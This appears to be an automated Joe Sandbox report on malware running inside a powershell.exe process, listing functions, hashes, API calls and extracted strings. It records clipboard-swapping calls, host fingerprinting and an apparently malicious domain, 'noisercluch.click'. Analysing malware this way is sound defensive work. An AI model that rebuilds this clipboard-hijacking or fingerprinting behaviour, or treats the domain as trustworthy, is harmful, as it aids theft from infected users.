Source File: 00000004.00000002.2953289967.0000000008980000.00000040.00000800.00020000.00000000.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf13f1917a0d4257f7e5dd5ee488543f9c4ee4e8964c2abd14d36d861c672241
Instruction ID: fc3db5b36793f104403d451f8b93018cce6c737e75ddfe57745e2d9fff1ae626
Opcode Fuzzy Hash: bf13f1917a0d4257f7e5dd5ee488543f9c4ee4e8964c2abd14d36d861c672241
Instruction Fuzzy Hash: 93E0C270901219CFEB14AF24E858BDD7BB2EB49309F1041A9E40AA7245CB3569D48F55

Function 072B9C20 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2945519784.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a08f702ba1580ca20993f4921e27a9446537932611e443255024766406407c84
Instruction ID: 72daf48dc19b87d15c2c1b186218c73acc030ce2698ac32178e639c2fc0988aa
Opcode Fuzzy Hash: a08f702ba1580ca20993f4921e27a9446537932611e443255024766406407c84
Instruction Fuzzy Hash: 3BD05EB052D108DBC714DB94D400AA8B7BCEB4A314F50C09CD94D53341CB73AD42DB44

Function 072B9C1F Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2945519784.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ab09b0a5284c16f4effca2723ad642423b5b70470504552bca10343cf646ce
Instruction ID: 7d2157a376e5939d0297ff1326c549b89bd96e4061c58165fd349226b9eaf2cd
Opcode Fuzzy Hash: 06ab09b0a5284c16f4effca2723ad642423b5b70470504552bca10343cf646ce
Instruction Fuzzy Hash: E1D017B452E148DFC724CBA8E440AE8BBB8AB4A314F14C19CD84A57252CA72AD42DB04

Function 0898DC90 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2953289967.0000000008980000.00000040.00000800.00020000.00000000.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8346fc426ef0215b8a785525fd3480f917577e8628bb16b0f7f269acd3ae2d04
Instruction ID: c776a15599de579d01dc9a785d6da0b02468a71ccf8b05740497615624cfd091
Opcode Fuzzy Hash: 8346fc426ef0215b8a785525fd3480f917577e8628bb16b0f7f269acd3ae2d04
Instruction Fuzzy Hash: 1AC08C71A1C2403FD20322188906886FB52CBE5B02B20C83AA0408305982346C02A3E3

Function 0740F94A Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2946066291.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a7d27df23128811f29d1c5c7522b58ba13f7002759d7fa170cd33f03f8669f8
Instruction ID: 5bc84aa104614bc0f6e44f9008f616a7e9a16873413634e8b7e03b6528651ef0
Opcode Fuzzy Hash: 3a7d27df23128811f29d1c5c7522b58ba13f7002759d7fa170cd33f03f8669f8
Instruction Fuzzy Hash: 7AC04C76E1011E9BCF14DBD9E4419DCF7B4EF94322F008036D214A7104D6315526CF50

Function 0898AD7B Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2953289967.0000000008980000.00000040.00000800.00020000.00000000.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92febe592c4dd494eaa66979ca96e26a49ee1ed422a1d31ff31246ec925ca3b6
Instruction ID: 2d8c30d6f8ee1afd4c0a4c9b3828d5acfe15777572f6918683bc3902bc1f6e2d
Opcode Fuzzy Hash: 92febe592c4dd494eaa66979ca96e26a49ee1ed422a1d31ff31246ec925ca3b6
Instruction Fuzzy Hash: 9AB01271B401109BDF20CFD46D077C037149700700F100040ED0E6BCC1C692644085A7

Non-executed Functions

Function 07AFF819 Relevance: 13.9, Strings: 11, Instructions: 195COMMON

Download Yara Rule

Strings

4'jq, xrefs: 07AFF8BB
tPjq, xrefs: 07AFF90D
4'jq, xrefs: 07AFF97A
4'jq, xrefs: 07AFF96A
4'jq, xrefs: 07AFF9F5
4'jq, xrefs: 07AFF8AF
4'jq, xrefs: 07AFF9E9
TQoq, xrefs: 07AFF9B9
tPjq, xrefs: 07AFF901
TQoq, xrefs: 07AFF855
TQoq, xrefs: 07AFF9C9

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$TQoq$TQoq$TQoq$tPjq$tPjq
API String ID: 0-4199185445
Opcode ID: c2748637ea0ac8a76d937157cfe7e9790cb60442892ebd0947fd4a6b9cfd93f0
Instruction ID: 6536eed692e3c8f1cad11394ae9676d43e36327b9f904da60a4f165da2f3c36d
Opcode Fuzzy Hash: c2748637ea0ac8a76d937157cfe7e9790cb60442892ebd0947fd4a6b9cfd93f0
Instruction Fuzzy Hash: EE6106B1B41209DFCB248FA8C4906AABBB6FFC5311F24855AFA615F294CB31DD05C791

Function 04BE0048 Relevance: 7.9, Strings: 6, Instructions: 445COMMON

Download Yara Rule

Strings

tPjq, xrefs: 04BE03BB
4'jq, xrefs: 04BE0103
4'jq, xrefs: 04BE0359
tPjq, xrefs: 04BE03AF
4'jq, xrefs: 04BE010F
4'jq, xrefs: 04BE0365

Memory Dump Source

Source File: 00000004.00000002.2907999635.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4be0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$tPjq$tPjq
API String ID: 0-1582633876
Opcode ID: 58bfd7f47def7f6e204b911211f66d4889f793fe1d23996188f4466efbbfef80
Instruction ID: 5d8e14c6870b1c9d068813228896bf03422e27a741f20e409c1ecb71821e040b
Opcode Fuzzy Hash: 58bfd7f47def7f6e204b911211f66d4889f793fe1d23996188f4466efbbfef80
Instruction Fuzzy Hash: 3EE126317043248FDB25AE6A985067AFBB6EFC5310F18C0ABD505CF296DB71E846C7A1

Function 07AFA148 Relevance: 6.6, Strings: 5, Instructions: 375COMMON

Download Yara Rule

Strings

$jq, xrefs: 07AFA22E
$jq, xrefs: 07AFA265
(ojq, xrefs: 07AFA290
$jq, xrefs: 07AFA255
(ojq, xrefs: 07AFA2A0

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID: (ojq$(ojq$$jq$$jq$$jq
API String ID: 0-473198576
Opcode ID: 0612609bf84cc206c1660653db24cca11fbda8e950774e0d217cf84c3a621c4c
Instruction ID: af9812e04a75e87cc59782f84f5caf0af46a4eb933ff845a0d30a580082c73da
Opcode Fuzzy Hash: 0612609bf84cc206c1660653db24cca11fbda8e950774e0d217cf84c3a621c4c
Instruction Fuzzy Hash: 99C12BB5700306DFCB159FA9C8447EBBBA6AFC7311F14C46AEA298B291DB31C841C761

Function 04BE1058 Relevance: 6.5, Strings: 5, Instructions: 291COMMON

Download Yara Rule

Strings

$jq, xrefs: 04BE10CB
4'jq, xrefs: 04BE110F
$jq, xrefs: 04BE10F3
$jq, xrefs: 04BE10E7
4'jq, xrefs: 04BE111B

Memory Dump Source

Source File: 00000004.00000002.2907999635.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4be0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$$jq$$jq$$jq
API String ID: 0-103809679
Opcode ID: 26078a308e2bf1e88b6431822999f5f7a7423070ec90bdcdf16583f9cedfd9cb
Instruction ID: 4143d017e0cc783edf4401907d9ac74441bf030130e27e3e8dd82608ba0ba3fa
Opcode Fuzzy Hash: 26078a308e2bf1e88b6431822999f5f7a7423070ec90bdcdf16583f9cedfd9cb
Instruction Fuzzy Hash: DA911675B042159FCB208E6ED8006BAFBE6EFC5311B3480BBC545CB652EB32E841C7A1

Function 07AFC4F0 Relevance: 6.4, Strings: 5, Instructions: 132COMMON

Download Yara Rule

Strings

$jq, xrefs: 07AFC568
$jq, xrefs: 07AFC576
$jq, xrefs: 07AFC543
4'jq, xrefs: 07AFC5E7
4'jq, xrefs: 07AFC5F3

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$$jq$$jq$$jq
API String ID: 0-103809679
Opcode ID: f6ddcce45aefe68264df76b5849b5fa719901a4f94cbdcbda8aa21e99ca1ef7c
Instruction ID: a4413ec8dd8c292b4eac0f8ec84e354ee21a4d07e5733dcafe9c7c45ef53d38e
Opcode Fuzzy Hash: f6ddcce45aefe68264df76b5849b5fa719901a4f94cbdcbda8aa21e99ca1ef7c
Instruction Fuzzy Hash: 1D415BF179421E8FDB285BE78510277B7A6AFD5134F24447BEA228B181DE36C805C772

Function 04BE91B0 Relevance: 5.3, Strings: 4, Instructions: 341COMMON

Download Yara Rule

Strings

4'jq, xrefs: 04BE94AA
4'jq, xrefs: 04BE9406
4'jq, xrefs: 04BE94C0
4'jq, xrefs: 04BE941C

Memory Dump Source

Source File: 00000004.00000002.2907999635.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4be0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq
API String ID: 0-4000621977
Opcode ID: 738e368168e40c0af61fdbefba952faf45ab41bdc6ae0152857b4ddd8e91aa4a
Instruction ID: 0c130901876ef6ec9d486362567a1d42107a6f5b6f31aad78413eb839f5d4a99
Opcode Fuzzy Hash: 738e368168e40c0af61fdbefba952faf45ab41bdc6ae0152857b4ddd8e91aa4a
Instruction Fuzzy Hash: D5E191B4A402199FDB24DB64C994BAEB7B2FF84304F5085E8D5096F385CB35AD86CF90

Function 04BE9C3F Relevance: 5.3, Strings: 4, Instructions: 279COMMON

Download Yara Rule

Strings

4'jq, xrefs: 04BE9E9B
4'jq, xrefs: 04BE9DF7
4'jq, xrefs: 04BE9E0D
4'jq, xrefs: 04BE9EB1

Memory Dump Source

Source File: 00000004.00000002.2907999635.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4be0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq
API String ID: 0-4000621977
Opcode ID: 26abf3c9e0b53a4cc697ec68162f61142d94f135c5e73e33012b85202624962a
Instruction ID: c3bcbc22ec2a6a8f58a450cad0425543ce3d4dcdca1a0ef1e0fea969eeed0c47
Opcode Fuzzy Hash: 26abf3c9e0b53a4cc697ec68162f61142d94f135c5e73e33012b85202624962a
Instruction Fuzzy Hash: D1C191B4B002189FDB14DB24C994BAABBB6FF84304F5085D8D609AB345CB35EE85CF91

Function 04BE063D Relevance: 5.1, Strings: 4, Instructions: 125COMMON

Download Yara Rule

Strings

tPjq, xrefs: 04BE07F7
4'jq, xrefs: 04BE07A1
(ojq, xrefs: 04BE068C
(ojq, xrefs: 04BE0680

Memory Dump Source

Source File: 00000004.00000002.2907999635.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4be0000_powershell.jbxd

Similarity

API ID:
String ID: (ojq$(ojq$4'jq$tPjq
API String ID: 0-3510671863
Opcode ID: ebe6cd2cdcbfdacad0d50c41f0475d6de7d4cf3d1834948117301aa30aaa8a8b
Instruction ID: e8608ad3aa803692659790999d97cefa9c7d337da87de92ac66048fbf6bdf734
Opcode Fuzzy Hash: ebe6cd2cdcbfdacad0d50c41f0475d6de7d4cf3d1834948117301aa30aaa8a8b
Instruction Fuzzy Hash: DA41E231B05221DFCB24AF5A8540B7ABBA2EFC4310F59C0E6D9049F282D7B1EC41CBA1

Function 07AF8F50 Relevance: 5.1, Strings: 4, Instructions: 119COMMON

Download Yara Rule

Strings

(ojq, xrefs: 07AF8F9F
tPjq, xrefs: 07AF90D7
(ojq, xrefs: 07AF8F93
$jq, xrefs: 07AF9054

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID: (ojq$(ojq$tPjq$$jq
API String ID: 0-3857383769
Opcode ID: e97f5f4bdbf839f1e973947affde3c34af48f938d98b46a6aeed34b846fc1332
Instruction ID: 965dea2cbdada8824ce8f7d71d8502de73459f7f1b0d5d40acbfe1936cffe958
Opcode Fuzzy Hash: e97f5f4bdbf839f1e973947affde3c34af48f938d98b46a6aeed34b846fc1332
Instruction Fuzzy Hash: F541F871A002459FCB209F98C944B6BBBE6EFC5310F58846AFA14DF292C771AD44C7A1

Function 04BE0F30 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$jq, xrefs: 04BE0F5E
$jq, xrefs: 04BE0F98
$jq, xrefs: 04BE0F8C
$jq, xrefs: 04BE0F42

Memory Dump Source

Source File: 00000004.00000002.2907999635.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4be0000_powershell.jbxd

Similarity

API ID:
String ID: $jq$$jq$$jq$$jq
API String ID: 0-2428501249
Opcode ID: b20f39ed30b88e4c004b49a2afe5fd2ecb466e76c03f16214d4a645e42761d24
Instruction ID: e767090c864716d2c57db2029a83748e69468247ab00d7bb9a1f85b664d7cd6f
Opcode Fuzzy Hash: b20f39ed30b88e4c004b49a2afe5fd2ecb466e76c03f16214d4a645e42761d24
Instruction Fuzzy Hash: D32135313103255BDF24A96B9840B37779ADFC1715F64C46AE809CB2C2DEB6E85183A1

Function 07AF0309 Relevance: 5.0, Strings: 4, Instructions: 50COMMON

Download Yara Rule

Strings

4'jq, xrefs: 07AF0373
4'jq, xrefs: 07AF037F
$jq, xrefs: 07AF0352
$jq, xrefs: 07AF035E

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$$jq$$jq
API String ID: 0-1496060811
Opcode ID: 1da4b92514df65f51cd6ca4e8b5604db244c80ff548765a5418875a02bc230b7
Instruction ID: 09c47b4df18737a019b651ade4a169bf1d5f93f93f691147f11d7b924cabeb7f
Opcode Fuzzy Hash: 1da4b92514df65f51cd6ca4e8b5604db244c80ff548765a5418875a02bc230b7
Instruction Fuzzy Hash: DA01F12130E3D24FC72B03685820167BFB69FC351071942DBD591DF2A7CA198D0AC3A3

Analysis Process: powershell.exePID: 2292, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	48.4%
Total number of Nodes:	304
Total number of Limit Nodes:	23

Executed Functions

Function 00436BF0 Relevance: 23.5, APIs: 12, Strings: 1, Instructions: 718
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00436E11
SysAllocString.OLEAUT32(F5A3FBA8), ref: 00436EDA
CoSetProxyBlanket.COMBASE(D77F9D52,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00436F18
SysAllocString.OLEAUT32(68DA6AD6), ref: 00436F6D
SysAllocString.OLEAUT32(BD01C371), ref: 00437025
VariantInit.OLEAUT32(F8FBFAF5), ref: 00437097
SysFreeString.OLEAUT32(?), ref: 00437372
SysFreeString.OLEAUT32(?), ref: 00437382
SysFreeString.OLEAUT32(?), ref: 00437388
SysFreeString.OLEAUT32(00000000), ref: 00437399
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004373D5

Strings

\, xrefs: 00436DCB

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: String$Free$Alloc$BlanketCreateInformationInitInstanceProxyVariantVolume
String ID: \
API String ID: 3857627774-2967466578
Opcode ID: 75a42a090690cbf01e55e82e48ecf76e61ca4ec783f0b790b218db4d75954228
Instruction ID: 8756ce95e963843fa03f31509ff188bcb667b0217098414990354d88698b1c24
Opcode Fuzzy Hash: 75a42a090690cbf01e55e82e48ecf76e61ca4ec783f0b790b218db4d75954228
Instruction Fuzzy Hash: 9132F1B1A483408FD724CF28C88076BBBE1EF99314F18892EE9D59B391D7789805CB56

Function 02F61000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000001), ref: 02F61032
OpenClipboard.USER32(00000000), ref: 02F6103C
GetClipboardData.USER32(0000000D), ref: 02F6104C
GlobalLock.KERNEL32(00000000), ref: 02F6105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 02F61090
GlobalLock.KERNEL32 ref: 02F610A0
GlobalUnlock.KERNEL32 ref: 02F610C1
EmptyClipboard.USER32 ref: 02F610CB
SetClipboardData.USER32(0000000D), ref: 02F610D6
GlobalFree.KERNEL32 ref: 02F610E3
GlobalUnlock.KERNEL32(?), ref: 02F610ED
CloseClipboard.USER32 ref: 02F610F3
GetClipboardSequenceNumber.USER32 ref: 02F610F9

Memory Dump Source

Source File: 00000008.00000002.4457550817.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000008.00000002.4457515607.0000000002F60000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4457584858.0000000002F62000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2f60000_powershell.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: 1c3db1948237d7e40d3a2ffa4bd9d8d22ee1fa4f62cea72b7aa8638f84238025
Instruction ID: 435b6ea8b6a7fa0485e697a0829038e5cc5abed0becf758d278eb12d0a0241cc
Opcode Fuzzy Hash: 1c3db1948237d7e40d3a2ffa4bd9d8d22ee1fa4f62cea72b7aa8638f84238025
Instruction Fuzzy Hash: 3E219B31E45254ABDB202F719C0EB7BB7A8FF04BC5F080824FE5DE6250EB218810C7A1

Function 00415640 Relevance: 14.9, APIs: 1, Strings: 7, Instructions: 943
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

YU]&, xrefs: 00416170
s|}, xrefs: 0041606E
Fi, xrefs: 00415D71
wq, xrefs: 00416063
JHN], xrefs: 00415D66
UR, xrefs: 00415AE3
>j%h, xrefs: 00415976

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: >j%h$Fi$JHN]$UR$YU]&$s|}$wq
API String ID: 0-2664314784
Opcode ID: 744f5921334badd97250c1c299283197a61e04fc11c6ff6aa40322fb847e4306
Instruction ID: 6413b6cc339066a55532578e80e6a8cd990dac4ee94ef104ad543d9b904f88e5
Opcode Fuzzy Hash: 744f5921334badd97250c1c299283197a61e04fc11c6ff6aa40322fb847e4306
Instruction Fuzzy Hash: 2E5224B5908740CBD7249F29D8527EFB7E1EFD5314F188A2EE48987391EB389841CB46

Function 00408720 Relevance: 7.7, APIs: 5, Instructions: 235
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408744
GetCurrentThreadId.KERNEL32 ref: 0040874E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408808
GetForegroundWindow.USER32 ref: 004089A1
ExitProcess.KERNEL32 ref: 00408A17

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 18fe486032edb0969c4fe46b9c72ea22f78cc782d11755b5447650c5aff50698
Instruction ID: 59a09f4aa6f0f146742c4b312151e509a05fd4ea0b744ce26f1448cff0f88d73
Opcode Fuzzy Hash: 18fe486032edb0969c4fe46b9c72ea22f78cc782d11755b5447650c5aff50698
Instruction Fuzzy Hash: E57168B3E043144BC318EF69DC4135AB6C79BC0714F1F813EA984EB3A5DE799C02869A

Function 0042BF45 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 336
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C34C

Strings

u, xrefs: 0042C364
L,2H, xrefs: 0042BF4D
@a, xrefs: 0042C2AF

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: @a$L,2H$u
API String ID: 3960555810-2528062038
Opcode ID: 19d08f9f7d7bed7b51ea453a9ddedc70aa30b931c2df07c4920a08e0e96f246b
Instruction ID: 260f7405a81d4791661634af8caf9a7863cff9be19d6ba05b95630b53f05b8d3
Opcode Fuzzy Hash: 19d08f9f7d7bed7b51ea453a9ddedc70aa30b931c2df07c4920a08e0e96f246b
Instruction Fuzzy Hash: 5B91D37050C3D08FD729CF3994A07ABBBD1AFA7308F58499ED4C997282D7398506CB5A

Function 0040D35C Relevance: 6.6, APIs: 2, Strings: 2, Instructions: 625
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 0040D368
CoUninitialize.COMBASE ref: 0040D7A4

Strings

(P, xrefs: 0040D7B2
noisercluch.click, xrefs: 0040D78B, 0040DBDE

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: Uninitialize
String ID: (P$noisercluch.click
API String ID: 3861434553-1665479885
Opcode ID: 806ca7b758aea85ba4256f5737dc198644c562e8fe769678b1b4da1df31b6c3a
Instruction ID: 25c0ec8a4ed120f5396a3a8eb6bdccd7f9d1ac3417b5368b8856c91530714b40
Opcode Fuzzy Hash: 806ca7b758aea85ba4256f5737dc198644c562e8fe769678b1b4da1df31b6c3a
Instruction Fuzzy Hash: 9522F37194D3C18AD335CF39D49079BBFE0AF96304F188AADC4D96B282D739450ACB96

Function 0042C289 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C34C

Strings

u, xrefs: 0042C364
@a, xrefs: 0042C2AF

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: @a$u
API String ID: 3960555810-583156259
Opcode ID: d3dcd12708497a123305e223026c5427f1c8ff29cf19f116bf7101b30c51974c
Instruction ID: fbcac5f05e551be09428fe54d577bd2475c49f62c0f93ee7e958261cddcd3d67
Opcode Fuzzy Hash: d3dcd12708497a123305e223026c5427f1c8ff29cf19f116bf7101b30c51974c
Instruction Fuzzy Hash: 4E81147050C3D08BD329CF3994A07ABBBD1AF97304F5849AED4C997382DB798506CB5A

Function 0043BAD0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043EA7B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043BAFE

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043C59C Relevance: 1.3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

9., xrefs: 0043C5F0

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID: 9.
API String ID: 2994545307-3220845746
Opcode ID: d0f1f6ee6bbcdd5cb9497a9d2a322c6123ac9a9efe9672d2a037b52046ddbbc1
Instruction ID: 6eaeed17bd0a61a2bdf4398491a9cff36e71a2c196544e54e2a45a99ade0a44b
Opcode Fuzzy Hash: d0f1f6ee6bbcdd5cb9497a9d2a322c6123ac9a9efe9672d2a037b52046ddbbc1
Instruction Fuzzy Hash: 34110835A006248BDB148F24DC957BB77E1FB5A324F28BA2CD851B73E1D774AC058B48

Function 00426230 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: be71ac3e148499bfd277c0229c39e24620fd1d390e69013dc2de0336fdde0987
Instruction ID: 8a02be16d1dd0dac6475031a666b285b020a312ea2db780e838c8bd6892e58d2
Opcode Fuzzy Hash: be71ac3e148499bfd277c0229c39e24620fd1d390e69013dc2de0336fdde0987
Instruction Fuzzy Hash: 30B17B71B083618BD714DF24E84263BB7E1EF95304F5A896EE88287385D63DDC06C79A

Function 004192C0 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

